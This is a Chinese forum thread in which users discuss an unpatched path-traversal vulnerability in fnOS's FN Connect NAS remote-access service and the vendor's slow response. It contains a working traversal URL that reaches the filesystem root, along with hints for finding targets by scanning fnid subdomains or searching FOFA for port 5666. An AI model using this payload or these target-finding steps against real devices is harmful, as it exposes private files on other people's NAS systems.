打开 FN Connect 随便输入一个 id ,只要撞上了能打开登录页,加上
/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../
直接就到 /了啊
太离谱了
/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../
直接就到 /了啊
太离谱了
 |
1
stinkytofux 1 月 31 日  3
0day 就是这么可怕, 更可怕的是捂盖子, 导致更多人受害.
|
 |
2
Tink OP PRO @stinkytofux 官方为什么不强推新版本呢,强制修复漏洞
|
 |
3
Joming 1 月 31 日
TMD 到现在都没发公告!好在公司发现比较早,不然严重泄露信息!再不会用了!
|
 |
4
wfhtqp 1 月 31 日
问题是飞牛不当回事,fnid 现在还不暂停,原来没有公网的也全暴漏了
|
|
5
wfhtqp 1 月 31 日 3
https://club.fnnas.com/forum.php?mod=viewthread&tid=48354 25 年 12 月。。。还有更早的。。。
|
 |
8
labubu 1 天前 via Android
不是绑定手机了吗,打电话发短信给用户呗?
|
 |
9
bitkuang 1 天前 via Android
没复现出来,还有别的条件吧
|
 |
10
haoshuaiwang 1 天前
写个脚本跑就行了
{fnid}.fnos.net |
 |
11
baton 1 天前 via Android 1
经历过宝塔后就不敢用国内这些面板,安全性是个大问题
|
 |
12
a9htdkbv 1 天前 via Android
还好我有先见之明,昨天早上关闭 fn connect ,晚上就把整个飞牛虚拟机扬了
|
 |
14
AkinoKaedeChan 1 天前 via Android
@emoker https://www.bt.cn/bbs/thread-54666-1-1.html phpMyAdmin 未授权访问
|
 |
15
flyqie 1 天前 via Android 1
是的,之前以为飞牛官方会做紧急的限制,现在看来似乎没有任何限制,不知道是限于架构问题做不了还是不想做。
|
 |
17
emoker 1 天前
@AkinoKaedeChan 感谢大佬
|
|
18
stinkytofux 1 天前
 |
 |
19
ryd994 1 天前 via Android
我相信有很多人就是图个 fnconnect 的方便。这下好了,不能开公网,不能用 fnconnect ,结果还是要自己配置 VPN/zerotier 。
我的 nas 只能通过 VPN 或者 cloudflare tunnel 访问,后者经过 zero trust 的鉴权。所有不登入就能访问的服务(比如 BT )都跑在容器里。 |
 |
21
sardina 17 小时 52 分钟前
2025-12-25 18:06:25 只看该作者回复
感谢反馈我转给负责的同事看看 一个月前就说反馈 结果还没修复。。。 |
 |
22
Curtion 17 小时 40 分钟前
还真是, 直接在 fofa 搜索 5666 端口,随便找一个进去就能访问到文件了。。 我觉得飞牛应该强制关闭 fn connet ,直到用户升级系统。
 |
 |
23
MiKing233 17 小时 31 分钟前
|
 |
25
panda188 15 小时 40 分钟前 via Android
不会降本增效,已经把负责这个,会这个的裁了吧?
|
 |
26
hatch 13 小时 27 分钟前
作死💊,估计内部也一团糟,问题流转半天找不到能挑担的人
|
 |
28
povsister 10 小时 0 分钟前 1
好几天了官方反代甚至不愿意上个 WAF 救一救后面的用户。哎
|
 |
29
chinni 8 小时 58 分钟前
其实现在点什么目录基本都 404 也没啥了,但是确实坑,不如直接用 zero trust
|
 |
32
someonesnone 5 小时 19 分钟前
@chinni #29 你别直接点链接, 你把目录名手动放在../../xxx 试试...
|
Select Language